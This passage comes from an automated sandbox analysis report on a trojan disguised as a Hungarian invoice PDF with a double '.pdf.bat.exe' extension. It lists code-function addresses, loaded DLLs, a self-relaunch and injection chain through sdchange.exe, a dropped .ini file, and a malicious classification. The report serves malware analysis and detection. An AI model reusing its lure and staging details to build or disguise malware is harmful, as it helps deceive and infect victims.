            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33570E595_2_33570E59
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362EE265_2_3362EE26
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362EEDB5_2_3362EEDB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33582E905_2_33582E90
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362CE935_2_3362CE93
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357AD005_2_3357AD00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360CD1F5_2_3360CD1F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356ADE05_2_3356ADE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33588DBF5_2_33588DBF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33570C005_2_33570C00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33560CF25_2_33560CF2
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33610CB55_2_33610CB5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C2E4F67_2_04C2E4F6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C324467_2_04C32446
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C244207_2_04C24420
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C405917_2_04C40591
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B805357_2_04B80535
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9C6E07_2_04B9C6E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B7C7C07_2_04B7C7C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B807707_2_04B80770
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BA47507_2_04BA4750
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C120007_2_04C12000
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C381CC7_2_04C381CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C341A27_2_04C341A2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C401AA7_2_04C401AA
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C081587_2_04C08158
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B701007_2_04B70100
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1A1187_2_04C1A118
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C002C07_2_04C002C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C202747_2_04C20274
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C403E67_2_04C403E6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8E3F07_2_04B8E3F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3A3527_2_04C3A352
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B70CF27_2_04B70CF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C20CB57_2_04C20CB5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B80C007_2_04B80C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B98DBF7_2_04B98DBF
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B7ADE07_2_04B7ADE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8AD007_2_04B8AD00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1CD1F7_2_04C1CD1F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3EEDB7_2_04C3EEDB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B92E907_2_04B92E90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3CE937_2_04C3CE93
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B80E597_2_04B80E59
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3EE267_2_04C3EE26
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BFEFA07_2_04BFEFA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B72FC87_2_04B72FC8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BA0F307_2_04BA0F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC2F287_2_04BC2F28
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C22F307_2_04C22F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF4F407_2_04BF4F40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B668B87_2_04B668B8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BAE8F07_2_04BAE8F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B828407_2_04B82840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8A8407_2_04B8A840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B829A07_2_04B829A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C4A9A67_2_04C4A9A6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B969627_2_04B96962
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B7EA807_2_04B7EA80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C36BD77_2_04C36BD7
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3AB407_2_04C3AB40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B714607_2_04B71460
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3F43F7_2_04C3F43F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C495C37_2_04C495C3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1D5B07_2_04C1D5B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C375717_2_04C37571
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C316CC7_2_04C316CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC56307_2_04BC5630
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3F7B07_2_04C3F7B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C2F0CC7_2_04C2F0CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3F0E07_2_04C3F0E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C370E97_2_04C370E9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B870C07_2_04B870C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B8B1B07_2_04B8B1B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C4B16B7_2_04C4B16B
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B6F1727_2_04B6F172
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB516C7_2_04BB516C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B852A07_2_04B852A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C212ED7_2_04C212ED
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9D2F07_2_04B9D2F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9B2C07_2_04B9B2C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC739A7_2_04BC739A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3132D7_2_04C3132D
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B6D34C7_2_04B6D34C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FCF27_2_04C3FCF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF9C327_2_04BF9C32
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9FDC07_2_04B9FDC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C31D5A7_2_04C31D5A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C37D737_2_04C37D73
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B83D407_2_04B83D40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B89EB07_2_04B89EB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B81F927_2_04B81F92
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B43FD57_2_04B43FD5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B43FD27_2_04B43FD2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FFB17_2_04C3FFB1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FF097_2_04C3FF09
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B838E07_2_04B838E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BED8007_2_04BED800
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C159107_2_04C15910
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B899507_2_04B89950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9B9507_2_04B9B950
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C2DAC67_2_04C2DAC6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BC5AA07_2_04BC5AA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C21AA37_2_04C21AA3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C1DAAC7_2_04C1DAAC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C37A467_2_04C37A46
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FA497_2_04C3FA49
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF3A6C7_2_04BF3A6C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04B9FB807_2_04B9FB80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BBDBF97_2_04BBDBF9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BF5BF07_2_04BF5BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04C3FB767_2_04C3FB76
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C620807_2_02C62080
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5CF407_2_02C5CF40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5CF3A7_2_02C5CF3A
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5B29F7_2_02C5B29F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5B2A07_2_02C5B2A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C513A17_2_02C513A1
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5B1507_2_02C5B150
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C5D1607_2_02C5D160
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C657407_2_02C65740
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C638F97_2_02C638F9
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C639427_2_02C63942
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C639407_2_02C63940
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C7BEB07_2_02C7BEB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: String function: 335DEA12 appears 82 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: String function: 3355B970 appears 262 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: String function: 335B7E54 appears 100 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: String function: 335EF290 appears 103 times
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: String function: 335A5130 appears 58 times
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 04BEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 04BFF290 appears 103 times
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 04BC7E54 appears 107 times
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 04B6B970 appears 262 times
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 04BB5130 appears 58 times
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.00000000334B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdchange.exej% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033801000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdchange.exej% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000332FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal84.troj.evad.winEXE@5/9@2/1
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_00402104 CoCreateInstance
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nss4058.tmp
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe File read: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
            Source: unknown Process created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Process created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Process created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe File written: C:\Windows\Resources\0809\mysterist.ini
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SkCSKJeVGx.exe, 00000006.00000002.2970784574.00000000007DE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara matchFile source: 00000000.00000002.2572461469.0000000004B5D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBC1B63
